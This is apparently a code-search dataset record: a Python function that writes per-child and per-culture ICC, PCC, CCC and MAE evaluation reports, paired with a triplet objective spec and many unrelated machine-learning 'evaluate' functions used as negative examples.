+ '\n' f.write(entry) # Generate report of summary statistics cultures = np.unique(country_test) for c in cultures: culture_rows = np.where(country_test == c)[0] # get row numbers for culture c culture_ids = id_test[culture_rows] # get ID rows for culture c unique_ids = np.unique(culture_ids) # get unique IDs for culture c for u in unique_ids: all_id_rows = np.where(id_test == u)[0] id_rows = np.intersect1d(all_id_rows, culture_rows) # get ID rows for child u id_icc = icc(results[id_rows], y_test[id_rows])[0] # compute ICC for child u id_pcc = pcc(results[id_rows], y_test[id_rows])[0][0] # compute PCC for child u id_ccc = ccc(results[id_rows], y_test[id_rows]) # compute CCC for child u id_mae = mae(results[id_rows], y_test[id_rows]) # compute MAE for child u icc_entry = '{},{},{}\n'.format(c, u, id_icc) pcc_entry = '{},{},{}\n'.format(c, u, id_pcc) ccc_entry = '{},{},{}\n'.format(c, u, id_ccc) mae_entry = '{},{},{}\n'.format(c, u, id_mae) with open('Reports/{}/icc_report.txt'.format(report_name), 'a') as f: f.write(icc_entry) with open('Reports/{}/pcc_report.txt'.format(report_name), 'a') as f: f.write(pcc_entry) with open('Reports/{}/ccc_report.txt'.format(report_name), 'a') as f: f.write(ccc_entry) with open('Reports/{}/mae_report.txt'.format(report_name), 'a') as f: f.write(mae_entry) return results
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate(self, test_data):\n result = self.model.run(test_data)\n self._save_result(result)", "def evaluate(self, dataset):\n\t\tpass", "def evaluate(\n self,\n test_data=None,\n print_report=True,\n save_path=\"ktrain_classification_report.csv\",\n class_names=[],\n ):\n return self.validate(\n val_data=test_data,\n print_report=print_report,\n save_path=save_path,\n class_names=class_names,\n )", "def evaluate():\n click.echo(\"Not implemented yet. In the future, this command will be used for evaluation.\")\n sys.exit(-2)", "def test_evaluate(self):\n # Check build does not raise errors\n dataset = KDDCupDataset()\n dataset.create_fixed_samples(\n *self.data, samples_num=1, partition_sizes=self.partition_sizes)\n dataset.set_current_sample(0)\n model = self.MODEL(dataset, **self.model_arguments)\n model.fit(training_epochs=50)\n metric = model.evaluate('test')\n self.assertLessEqual(0, metric)\n self.assertGreaterEqual(1, metric)", "def evaluate(self, test_data, test_labels):\n raise NotImplementedError", "def evaluate(parser):\n required_args = (\n 'train_tfrecord',\n 'valid_tfrecord',\n 'predicted_data',\n 'actual_data',\n )\n cli_args = add_all_args(parser, EVALUATION, *required_args)\n evaluator = Evaluator(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n classes_file=cli_args.classes,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n )\n predicted = pd.read_csv(cli_args.predicted_data)\n actual = pd.read_csv(cli_args.actual_data)\n evaluator.calculate_map(\n prediction_data=predicted,\n actual_data=actual,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n save_figs=cli_args.save_figs,\n plot_results=cli_args.plot_stats,\n )", "def evaluate(model, datagen, X_test, Y_test, batch_size, save_folder_path=None):\n\n print(\"[INFO] Evaluating model...\")\n\n scores = model.evaluate_generator(\n datagen.flow(X_test, Y_test, batch_size=batch_size),\n verbose=1)\n \n print(\"[INFO] Evaluation results:\\n{0}: {1:.2f}\\n{2}: {3:.2f}\".format(model.metrics_names[0], scores[0]*100, model.metrics_names[1], scores[1]*100))\n \n if save_folder_path is not None:\n # Write results to path\n assert os.path.isdir(save_folder_path) == True, \"Unable to save evaluation results, save_folder_path is not a folder\"\n eval_results_path = save_folder_path + \"/eval_results.txt\"\n eval_handle = open(eval_results_path, 'w')\n eval_handle.write(\"Model name: {}\\n\\n\".format(MODEL_NAME))\n eval_handle.write(\"Evaluation results:\\n{0}: {1:.2f}\\n{2}: {3:.2f}\".format(model.metrics_names[0], scores[0]*100, model.metrics_names[1], scores[1]*100))\n eval_handle.close()", "def _evaluate_model(\n run_id: str, dataset_filename: str, dataset_sampling_column: str = None\n):\n fix_multiprocessing_with_keras_on_macos()\n\n run = _get_run(run_id)\n hyperparameters = run.config\n\n # no need to run this on a gpu since it's 1 epoch\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n with ModelBestH5File(run) as model_h5_filepath:\n model = _load_untrainable_model(hyperparameters, model_h5_filepath)\n\n model_name = run.config[\"model_name\"]\n x, y = _get_prepared_dataset(\n model_name, hyperparameters, dataset_filename, dataset_sampling_column\n )\n\n wandb.init(\n config={\n \"run_id\": run_id,\n \"dataset_filename\": dataset_filename,\n \"dataset_sampling_column\": dataset_sampling_column,\n },\n 
tags=[\"model-evaluation\"],\n )\n\n batch_size = hyperparameters[\"batch_size\"]\n label_scale_factor_mmhg = hyperparameters[\"label_scale_factor_mmhg\"]\n acceptable_error_mg_l = hyperparameters[\"acceptable_error_mg_l\"]\n acceptable_fraction_outside_error = hyperparameters[\n \"acceptable_fraction_outside_error\"\n ]\n\n # we're using fit() instead of evaluate() to get the functionality of these callbacks\n # training performance in the results should be ignored, as it can be affected by some\n # training-only layers such as dropout\n model.fit(\n x,\n y,\n batch_size=batch_size,\n epochs=1,\n verbose=2,\n validation_data=(x, y),\n callbacks=[\n ThresholdValMeanAbsoluteErrorOnCustomMetric(\n acceptable_fraction_outside_error=acceptable_fraction_outside_error,\n acceptable_error_mg_l=acceptable_error_mg_l,\n ),\n WandbCallback(verbose=1, monitor=\"val_adjusted_mean_absolute_error\"),\n LogPredictionsAndWeights(\n metric=\"val_adjusted_mean_absolute_error\",\n dataset=([], [], x, y),\n label_scale_factor_mmhg=label_scale_factor_mmhg,\n ),\n ],\n )\n\n # returning model and dataset for use in jupyter notebooks\n return model, (x, y)", "def evaluate_data(df_train, w_train, df_test, w_test,\n evaluation_setups=None, preprocessing=None):\n if evaluation_setups is None:\n evaluation_setups = standard_evaluation_setups\n if preprocessing is None:\n preprocessing = preprocess\n if (\"weights\" in df_train) and df_train[\"weights\"].size > 0:\n weights = df_train[\"weights\"].as_matrix().squeeze()\n else:\n weights = np.ones(df_train.shape[0])\n\n # create a new dataframe which will hold all the generated errors\n df = pd.DataFrame()\n for one_w_train, one_w_test in zip(w_train, w_test):\n # setup testing function\n X_test, y_test = preprocessing(df_test, snr=one_w_test)\n # extract noisy data\n X_train, y_train = preprocessing(df_train, snr=one_w_train)\n for e in evaluation_setups:\n regressor = e.regressor\n regressor.fit(X_train, y_train, weights)\n y_pred = regressor.predict(X_test)\n # save results to a dataframe\n errors = np.abs(y_pred - y_test)\n errors = errors.reshape(len(errors), 1)\n current_df = DataFrame(errors * 100,\n columns=[\"Errors\"])\n current_df[\"Method\"] = e.name\n current_df[\"SNR\"] = int(one_w_test)\n df = pd.concat([df, current_df], ignore_index=True)\n\n return df", "def evaluate(self) :\n pass", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def evaluated_data(self) -> Dict:\n if not self.eval_data:\n raise Exception(\"Evaluation Failed\")\n\n statistics = [stat['statistics'] for stat in self.eval_data]\n for count, stat in enumerate(statistics):\n if stat:\n eval_data = stat.split(\"=\")\n char_error = re.findall(r\"\\d+\\.\\d+\", eval_data[-2])[0]\n word_error = eval_data[-1]\n\n self.eval_data[count]['character_error'] = float(char_error)\n self.eval_data[count]['word_error'] = float(word_error)\n del self.eval_data[count]['statistics']\n\n return self.eval_data", "def Evaluate():\n global reg\n reg = ModelRegression()\n \n # Retrieve dataset files\n data_fls, ref_fls = LoadTroikaDataset()\n errs, confs = [], []\n for data_fl, ref_fl in zip(data_fls, ref_fls):\n # Run the pulse rate algorithm on each trial in the dataset\n errors, confidence = RunPulseRateAlgorithm(data_fl, ref_fl)\n errs.append(errors)\n confs.append(confidence)\n # Compute aggregate error metric\n errs = np.hstack(errs)\n confs = np.hstack(confs)\n return AggregateErrorMetric(errs, confs)", "def validate(self):\n self.set_model_mode('eval')\n self.evaluator.reset()\n losses = 
MetricMeter()\n\n print('Do evaluation on {} set'.format('valid set'))\n data_loader = self.val_loader\n assert data_loader is not None\n for batch_idx, batch in enumerate(data_loader):\n input, label = self.parse_batch_test(batch)\n loss = self.forward_backward(batch, backprob=False)\n losses.update(loss)\n # total_loss += loss['loss']\n output = self.model_inference(input)\n self.evaluator.process(output, label)\n\n results = self.evaluator.evaluate()\n total_loss = losses.meters['loss_x'].avg\n\n for k, v in results.items():\n tag = '{}/{}'.format('validation', k)\n self.write_scalar(tag, v, self.epoch)\n # if full_results:\n return [total_loss,losses.dict_results(),results]\n # return total_loss", "def evaluate(self, dataset):\n logging.info('Start evaluation')\n\n loss, predictions, labels = self.run_one_epoch(dataset, RunnerPhase.VALIDATE)\n\n metrics_dict = self.metric_class.get_metrics_dict(predictions, labels)\n\n eval_info = self.metric_class.metrics_dict_to_str(metrics_dict)\n\n logging.info(eval_info)\n\n logging.info('Evaluation finished')\n\n return metrics_dict", "def evaluate(cfg: DictConfig):\n\n experiments = cfg.get('experiment_type', f'{cfg.model.name}_only')\n fixed_t0 = cfg.get('fixed_t0', False)\n ext = '_fixedT0' if fixed_t0 else ''\n\n base_dir = cfg.device.root\n datasource = cfg.datasource.name\n\n if experiments == 'ablations':\n models = {\n 'FluxRGNN': ['final',\n 'final_without_encoder',\n 'final_without_boundary'],\n 'LocalLSTM': ['final']\n }\n elif experiments == 'final':\n models = {\n 'FluxRGNN': ['final'],\n 'GAM': ['final'],\n 'HA': ['final'],\n 'GBT': ['final']\n }\n else:\n m = cfg.model.name\n year = cfg.datasource.test_year\n\n # find all experiments available for this model, datasource and test year\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{year}')\n models = {\n m : [ f.name for f in os.scandir(result_dir) if f.is_dir() ]\n }\n\n\n # thresholds for binary classification metrics\n if cfg.datasource.name == 'abm':\n thresholds = [0.0019, 0.0207]\n else:\n thresholds = [0, 10, 20]\n\n rmse_per_hour = []\n mae_per_hour = []\n pcc_per_hour = []\n bin_per_hour = []\n\n rmse_per_night = []\n mae_per_night = []\n\n output_dir = osp.join(base_dir, 'results', datasource, f'performance_evaluation{ext}', experiments)\n os.makedirs(output_dir, exist_ok=True)\n\n counter = 0\n\n for m, dirs in models.items():\n print(f'evaluate {m}')\n\n for d in dirs:\n result_dir = osp.join(base_dir, 'results', datasource, m, f'test_{cfg.datasource.test_year}', d)\n\n # check if directory exists\n if os.path.isdir(result_dir):\n results, model_cfg = load_cv_results(result_dir, trials=cfg.task.repeats, ext=ext)\n\n df_prep = pd.read_csv(osp.join(base_dir, 'data', 'preprocessed',\n f'{model_cfg[\"t_unit\"]}_{model_cfg[\"model\"][\"edge_type\"]}_ndummy={model_cfg[\"datasource\"][\"n_dummy_radars\"]}',\n datasource, cfg.season, str(cfg.datasource.test_year), 'dynamic_features.csv'))\n tidx2night = dict(zip(df_prep.tidx, df_prep.nightID))\n\n rmse_per_hour.append(compute_rmse(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n mae_per_hour.append(compute_mae(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n pcc_per_hour.append(compute_pcc(m, d, results, tidx2night, groupby=['horizon', 'trial'],\n threshold=0, km2=True, fixed_t0=fixed_t0))\n\n if fixed_t0:\n rmse_per_night.append(compute_rmse_per_night(m, d, results, tidx2night, 
groupby=['night_horizon', 'trial']))\n mae_per_night.append(compute_mae_per_night(m, d, results, tidx2night, groupby=['night_horizon', 'trial']))\n\n # compute binary classification measures\n for thr in thresholds:\n bin_per_hour.append(compute_bin(m, d, results, groupby=['horizon', 'trial'], threshold=thr, km2=True))\n\n counter += 1\n\n else:\n print(f'Experiment \"{d}\" for model \"{m}\" and datasource \"{datasource}\" is not available. '\n f'Use \"run_experiments.py model={m} datasource={datasource} +experiment={d}\" to run this experiment.')\n\n if counter > 0:\n rmse_per_hour = pd.concat(rmse_per_hour)\n rmse_per_hour.to_csv(osp.join(output_dir, f'rmse_per_hour.csv'))\n\n mae_per_hour = pd.concat(mae_per_hour)\n mae_per_hour.to_csv(osp.join(output_dir, f'mae_per_hour.csv'))\n\n pcc_per_hour = pd.concat(pcc_per_hour)\n pcc_per_hour.to_csv(osp.join(output_dir, f'pcc_per_hour.csv'))\n\n bin_per_hour = pd.concat(bin_per_hour)\n bin_per_hour.to_csv(osp.join(output_dir, f'bin_per_hour.csv'))\n\n if fixed_t0:\n rmse_per_night = pd.concat(rmse_per_night)\n rmse_per_night.to_csv(osp.join(output_dir, f'rmse_per_night.csv'))\n\n mae_per_night = pd.concat(mae_per_night)\n mae_per_night.to_csv(osp.join(output_dir, f'mae_per_night.csv'))", "def regression_evaluation(self, test_set, predicted_values):\r\n\r\n MAE = self.mean_absolute_error(test_set, predicted_values)\r\n MSE = self.mean_square_error(test_set, predicted_values)\r\n print(f\"Mean Percent Error:\\t{MAE:.2f}\")\r\n print(f\"Mean Square Error:\\t{MSE:.2f}\")", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def _check_evaluate_implementation(self) -> None:\n logging.debug(f\"Evaluate_batch_defined: {self._evaluate_batch_defined()}.\")\n logging.debug(f\"Evaluate full dataset defined: {self._evaluate_full_dataset_defined()}.\")\n check.not_eq(\n self._evaluate_batch_defined(),\n self._evaluate_full_dataset_defined(),\n \"Please define exactly one of: `evaluate_batch()` or `evaluate_full_dataset()`. 
\"\n \"For most use cases `evaluate_batch()` is recommended is recommended because \"\n \"it can be parallelized across all devices.\",\n )", "def evaluate(self, data, metric, classes=None):\n func_dict = {\n 'mutual_information': sklearn.metrics.mutual_info_score,\n 'normed_mutual_information': sklearn.metrics.normalized_mutual_info_score,\n 'square_error': sklearn.metrics.mean_squared_error,\n 't-test': scipy.stats.ttest_ind,\n 'wilcoxon': scipy.stats.wilcoxon,\n 'correlation': np.corrcoef\n }\n self.make_signature(data, classes)\n try:\n if metric in {'mutual_information', 'normed_mutual_information'}:\n self.score = func_dict[metric](classes, self.digit_signature()) \n elif metric == 'square_error':\n self.score = func_dict[metric](classes, self.signatures)\n elif metric in {'t-test', 'wilcoxon'} :\n self.score = np.abs(func_dict[metric](self.signatures[classes==1], \\\n self.signatures[classes==0])[0])\n \n elif metric == 'correlation':\n self.score = func_dict[metric](classes, self.signatures)[1,0]\n \n except: KeyError(\"no such a function\") \n \n return self.score", "def evaluate(self):\n raise Exception(\"Not implemented.\")", "def validate(\n self,\n val_data=None,\n print_report=True,\n save_path=\"ktrain_classification_report.csv\",\n class_names=[],\n ):\n if val_data is not None:\n val = val_data\n else:\n val = self.val_data\n\n classification, multilabel = U.is_classifier(self.model)\n if not classification:\n # warnings.warn('learner.validate is only for classification problems. '\n #'For regression, etc., use learner.predict and learner.ground_truth '\n #'to manually validate.')\n # return\n pass\n is_multilabel = U.is_multilabel(val) or multilabel\n y_pred = self.predict(val_data=val)\n y_true = self.ground_truth(val_data=val)\n y_pred = np.squeeze(y_pred)\n y_true = np.squeeze(y_true)\n\n # regression evaluation\n if not classification:\n from sklearn.metrics import mean_absolute_error, mean_squared_error\n\n regout = []\n metrics = U.metrics_from_model(self.model)\n for m in metrics:\n if m in [\"mae\", \"mean_absolute_error\"]:\n regout.append((m, mean_absolute_error(y_true, y_pred)))\n elif m in [\"mse\", \"mean_squared_error\"]:\n regout.append((m, mean_squared_error(y_true, y_pred)))\n if not regout:\n warnings.warn(\n \"%s is not supported by validate/evaluate - falling back to MAE\"\n )\n regout.append((\"mae\", mean_absolute_error(y_true, y_pred)))\n return regout\n\n if len(y_pred.shape) == 1:\n y_pred = np.where(y_pred > 0.5, 1, 0)\n y_true = np.where(y_true > 0.5, 1, 0)\n elif is_multilabel:\n from sklearn.preprocessing import binarize\n\n y_pred = binarize(y_pred, threshold=0.5)\n else:\n y_pred = np.argmax(y_pred, axis=1)\n y_true = np.argmax(y_true, axis=1)\n\n if print_report or save_path is not None:\n if class_names:\n try:\n class_names = [str(s) for s in class_names]\n except:\n pass\n report = classification_report(\n y_true,\n y_pred,\n target_names=class_names,\n output_dict=not print_report,\n )\n else:\n report = classification_report(\n y_true,\n y_pred,\n output_dict=not print_report,\n zero_division=0,\n )\n if print_report:\n print(report)\n else:\n df = pd.DataFrame(report).transpose()\n df.to_csv(save_path)\n print(\"classification report saved to: %s\" % (save_path))\n cm_func = confusion_matrix\n if is_multilabel:\n warnings.warn(\n \"Confusion matrices do not currently support multilabel classification, so returning None\"\n )\n return\n\n cm = confusion_matrix(y_true, y_pred)\n return cm", "def test_evaluate():\n X_train, X_test, 
y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def evaluate_print(self, test_data):\n test_results = [(np.argmax(self.feedforward(x)), np.argmax(y)) #argmax 返回最大数的索引\n for (x, y) in test_data]\n #统计预测错误的数据特征\n error = []\n for i, (x, y) in enumerate(test_results):\n if (x!=y):\n error.append(test_data[i][0])\n error = np.insert(error, 0, values=y, axis=1) #将正确答案插入第一行\n right = sum(int(x == y) for (x, y) in test_results)\n #打印出用全部测试集进行测试得到的结果\n print( \"TrainTest : {0} / {1} = {2}\".format(\n right, len(test_data), round(right/len(test_data),6) ))\n return error", "def evaluate(self):\r\n raise Exception(\"Not implemented.\")", "def eval_n_verify(yaml_data, dry_run, fail_eval):\n print('='*10, 'Verifying Results', '='*10)\n try:\n for model in yaml_data['models']:\n for i, topic in enumerate(yaml_data['topics']):\n for eval in yaml_data['evals']:\n eval_cmd = [\n os.path.join(yaml_data['root'], eval['command']),\n ' '.join(eval['params']) if eval['params'] else '',\n os.path.join(yaml_data['root'], yaml_data['qrels_root'], topic['qrel']),\n 'run.{0}.{1}.{2}'.format(yaml_data['name'], model['name'], topic['path'])\n ]\n if dry_run:\n print(' '.join(eval_cmd))\n continue\n\n out = [line for line in check_output(' '.join(eval_cmd)).decode('utf-8').split('\\n') if line.strip()][-1]\n if not out.strip():\n continue\n eval_out = out.strip().split(eval['separator'])[eval['parse_index']]\n expected = round(model['results'][eval['metric']][i], eval['metric_precision'])\n real = round(float(eval_out), eval['metric_precision'])\n if isclose(expected, real):\n print(OKBLUE, '[OK]', yaml_data['name'], model['name'], topic['name'], eval['metric'], expected, real, ENDC)\n else:\n print(FAIL, ['ERROR'], yaml_data['name'], model['name'], topic['name'], eval['metric'], expected, real, '!!!!', ENDC)\n if fail_eval:\n assert False\n finally:\n print(ENDC)", "def evaluate():\n log.info('Loading dev data...')\n if args.version_2:\n dev_data = SQuAD('dev', version='2.0')\n else:\n dev_data = SQuAD('dev', version='1.1')\n (_, _), (data_file_name, _) \\\n = dev_data._data_file[dev_data._version][dev_data._segment]\n dev_data_path = os.path.join(dev_data._root, data_file_name)\n\n if args.debug:\n sampled_data = [dev_data[0], dev_data[1], dev_data[2]]\n dev_data = mx.gluon.data.SimpleDataset(sampled_data)\n log.info('Number of records in dev data: %d', len(dev_data))\n\n dev_data_features = preprocess_dataset(\n tokenizer, dev_data, vocab=vocab, max_seq_length=args.max_seq_length,\n doc_stride=args.doc_stride, num_workers=args.num_workers,\n max_query_length=args.max_query_length, load_from_pickle=args.load_pickle,\n feature_file=args.dev_dataset_file)\n\n dev_data_input = convert_full_features_to_input_features(dev_data_features)\n log.info('The number of examples after preprocessing: %d', len(dev_data_input))\n\n dev_dataloader = mx.gluon.data.DataLoader(dev_data_input, batchify_fn=batchify_fn,\n num_workers=4, batch_size=args.test_batch_size,\n shuffle=False, last_batch='keep')\n\n log.info('start prediction')\n\n all_results = collections.defaultdict(list)\n\n epoch_tic = time.time()\n total_num = 0\n for (batch_id, data) in enumerate(dev_dataloader):\n data_list = list(split_and_load(data, ctx))\n for splited_data in data_list:\n example_ids, inputs, token_types, valid_length, p_mask, _, _, _ = splited_data\n total_num += len(inputs)\n outputs = net_eval(inputs, token_types, valid_length, 
p_mask=p_mask)\n example_ids = example_ids.asnumpy().tolist()\n for c, example_ids in enumerate(example_ids):\n result = RawResultExtended(start_top_log_probs=outputs[0][c].asnumpy().tolist(),\n start_top_index=outputs[1][c].asnumpy().tolist(),\n end_top_log_probs=outputs[2][c].asnumpy().tolist(),\n end_top_index=outputs[3][c].asnumpy().tolist(),\n cls_logits=outputs[4][c].asnumpy().tolist())\n all_results[example_ids].append(result)\n if batch_id % args.log_interval == 0:\n log.info('Batch: %d/%d', batch_id + 1, len(dev_dataloader))\n\n epoch_toc = time.time()\n log.info('Time cost=%2f s, Thoughput=%.2f samples/s', epoch_toc - epoch_tic,\n total_num / (epoch_toc - epoch_tic))\n\n log.info('Get prediction results...')\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n scores_diff_json = collections.OrderedDict()\n for features in dev_data_features:\n results = all_results[features[0].example_id]\n example_qas_id = features[0].qas_id\n score_diff, best_non_null_entry, nbest_json = predict_extended(\n features=features, results=results, n_best_size=args.n_best_size,\n max_answer_length=args.max_answer_length, start_n_top=args.start_top_n,\n end_n_top=args.end_top_n)\n scores_diff_json[example_qas_id] = score_diff\n all_predictions[example_qas_id] = best_non_null_entry\n all_nbest_json[example_qas_id] = nbest_json\n\n output_prediction_file = os.path.join(args.output_dir, 'predictions.json')\n output_nbest_file = os.path.join(args.output_dir, 'nbest_predictions.json')\n output_null_log_odds_file = os.path.join(args.output_dir, 'null_odds.json')\n\n with open(output_prediction_file, 'w') as writer:\n writer.write(json.dumps(all_predictions, indent=4) + '\\n')\n with open(output_nbest_file, 'w') as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + '\\n')\n with open(output_null_log_odds_file, 'w') as writer:\n writer.write(json.dumps(scores_diff_json, indent=4) + '\\n')\n\n if os.path.exists(sys.path[0] + '/evaluate-v2.0.py'):\n arguments = [\n dev_data_path, output_prediction_file, '--na-prob-thresh',\n str(args.null_score_diff_threshold)\n ]\n if args.version_2:\n arguments += ['--na-prob-file', output_null_log_odds_file]\n subprocess.call([sys.executable, sys.path[0] + '/evaluate-v2.0.py'] + arguments)\n else:\n log.info('Please download evaluate-v2.0.py to get evaluation results for SQuAD. 
'\n 'Check index.rst for the detail.')", "def evaluate(model, eval_data, num_labels): \n # Turn on the evaluation state to ignore dropouts\n model.eval()\n results = [predict(model, x) for x, y in eval_data]\n f1_score, accuracy = get_metrics(np.array([y for x, y in eval_data]), results, num_labels)\n return f1_score, accuracy", "def evaluate(self):\n\n\t\t## We should be evaluating on dev dataset as well, so commenting x_test\n\t\t#self.model_score = self.model.evaluate(self.x_test, self.y_test_oh, batch_size=2048)\n\t\tself.model_score = self.model.evaluate(self.x_dev, self.y_dev_oh, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\n\t\t##Saving atucal vs predicted predictions\n\t\t##np.argmax returns the index where it see's 1 in the row\n\t\t#y_pred = np.argmax(self.model.predict(self.x_test, batch_size=2048), axis=1)\n\t\ty_pred = np.argmax(self.model.predict(self.x_dev, batch_size=2048), axis=1)\n\n\t\t## vstack will stack them in 2 rows, so we use Trasnpose to get them in column stack\n\t\t#output_predict = np.vstack((np.argmax(self.y_test_oh, axis=1), y_pred)).T\n\t\toutput_predict = np.vstack((np.argmax(self.y_dev_oh, axis=1), y_pred)).T\n\t\toutputFile = self.resultDir + \"/outputPredict.csv\" \n\t\tnp.savetxt(outputFile, output_predict, fmt=\"%5.0f\", delimiter=\",\")\n\n\t\t##Error Analysis of the prediction\n\t\terrorAnalysis(outputFile)\n\n\t\treturn self.model_score", "def _evaluate(self):\n logging.warning('-> evaluate EMPTY experiment...')", "def model_evaluate(model,x_train,n_y_array,x_val, vald_array):\n\n scores = model.evaluate(x_train, n_y_array, verbose=1)\n\n scores2 = model.evaluate(x_val, vald_array, verbose=1)\n\n\n print(\"for traininf set\")\n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores[0]))\n\n\n\n print(\"for validation set : \") \n\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores2[1]*100))\n\n print(\"%s: %.2f%%\" % (model.metrics_names[0], scores2[0]))", "def test_evaluate_model(sequential_model, model_data):\n _, _, _, _, x_test, y_test = model_data\n compile_model(sequential_model)\n output = evaluate_model(sequential_model, x_test, y_test, 64)\n assert len(output) == 2", "def evaluate(self, dataset):\n return self.model.evaluate(dataset.X_val, dataset.y_val)", "def evaluate(self):\n\n rew_rl = []\n for ckpt_path in self._config.eval_ckpt_paths:\n self._load_ckpt(ckpt_path, self._config.ckpt_num)\n\n logger.info(\n \"Run %d evaluations for %d environments\",\n self._config.num_eval,\n len(self._envs),\n )\n rollouts, info = self._evaluate(record_video=self._config.record_video)\n\n info_stat = info.get_stat()\n\n rew_rl.append(np.mean(info[\"rew_rl\"]))\n\n logger.info(\"All Eval Rew Values: %s\", rew_rl)\n logger.info(\"Eval Rew RL Average: %f, Std: %f\", np.mean(rew_rl), np.std(rew_rl))\n\n os.makedirs(\"result\", exist_ok=True)\n with h5py.File(\"result/{}.hdf5\".format(self._config.run_name), \"w\") as hf:\n for k, v in info.items():\n hf.create_dataset(k, data=info[k])\n with open(\"result/{}.txt\".format(self._config.run_name), \"w\") as f:\n for k, v in info_stat.items():\n f.write(\"{}\\t{:.03f} $\\\\pm$ {:.03f}\\n\".format(k, v[0], v[1]))", "def evaluate(env, X_data, y_data, batch_size=1):\n print('\\nEvaluating')\n n_sample = X_data.shape[0]\n n_batch = int((n_sample+batch_size-1) / batch_size)\n loss, acc = 0, 0\n for batch in range(n_batch):\n print(' batch {0}/{1}'.format(batch + 1, n_batch))\n print('\\r')\n 
start = batch * batch_size\n end = min(n_sample, start + batch_size)\n cnt = end - start\n batch_loss, batch_acc = env.sess.run(\n [env.loss, env.acc],\n feed_dict={env.x: X_data[start:end],\n env.y: y_data[start:end]})\n loss += batch_loss * cnt\n acc += batch_acc * cnt\n loss /= n_sample\n acc /= n_sample\n print(' loss: {0:.4f} acc: {1:.4f}'.format(loss, acc))\n return loss, acc", "def error_analyze(\n self,\n data_dir: Path,\n processed_data_dir: Path,\n result_dir: Path,\n output_report_dir: Path,\n ) -> NoReturn:\n pass", "def evaluate_model(model, X_train, y_train, X_test, y_test):\n model = model\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n\n report = classificationreport(y_test, y_pred, target_names= [\"0\", \"1\"], output_dict=True)\n\n return report", "def evaluate(self):\n # Method variables definition\n X_train, X_test, y_train, y_test = dm.reshape_y_set_split_data(self.datasetManager)\n featureScaleDependentVariables = self.datasetManager.params.featureScaleDependentVariables\n\n # Feature Scaling\n X_scaler, X_train = dm.do_feature_scaling(X_train)\n if featureScaleDependentVariables:\n y_scaler, y_train = dm.do_feature_scaling(y_train)\n else:\n y_scaler = None\n y_train = self.datasetManager.y_train\n \n self.X_scaler = X_scaler\n self.y_scaler = y_scaler\n\n # Training the SVR model on the training set\n regressor = SVR(kernel = 'rbf')\n regressor.fit(X_train, y_train.ravel())\n self.regressor = regressor\n\n # Predicting the Test set results\n self.y_pred = y_scaler.inverse_transform(regressor.predict(X_scaler.transform(X_test))) if featureScaleDependentVariables else regressor.predict(X_test)\n \n # Returning the process result : the regression type and the predicted dependent variables set\n return [\"Support Vector Regression\", self.get_r2_score(y_test, self.y_pred)]", "def evaluate(self):\n raise NotImplementedError()", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def evaluate(self):\n predictions = self.model.predict(self.test[0])\n accuracy = accuracy_score(self.test[1], predictions)\n print(\"Accuracy:\", str(accuracy * 100) + \"%\")\n self.plot_results(predictions)", "def test_evaluate_error_score(error_score, return_data, strategy, backend):\n # skip test for dask backend if dask is not installed\n if backend == \"dask\" and not _check_soft_dependencies(\"dask\", severity=\"none\"):\n return None\n\n forecaster = ExponentialSmoothing(sp=12)\n y = load_airline()\n # add NaN to make ExponentialSmoothing fail\n y.iloc[1] = np.nan\n fh = [1, 2, 3]\n cv = ExpandingWindowSplitter(step_length=48, initial_window=12, fh=fh)\n if error_score in [np.nan, 1000]:\n with pytest.warns(FitFailedWarning):\n results = evaluate(\n forecaster=forecaster,\n y=y,\n cv=cv,\n return_data=return_data,\n error_score=error_score,\n strategy=strategy,\n backend=backend,\n )\n if isinstance(error_score, type(np.nan)):\n assert results[\"test_MeanAbsolutePercentageError\"].isna().sum() > 0\n if error_score == 1000:\n assert results[\"test_MeanAbsolutePercentageError\"].max() == 1000\n if error_score == \"raise\":\n with pytest.raises(Exception): # noqa: B017\n evaluate(\n forecaster=forecaster,\n y=y,\n cv=cv,\n return_data=return_data,\n error_score=error_score,\n strategy=strategy,\n )", "def error_analysis(predictions, gold, result_collector):\n # scores = defaultdict(list)\n for iteration_id, texts in predictions.items():\n # map iteration id to fold\n fold = 
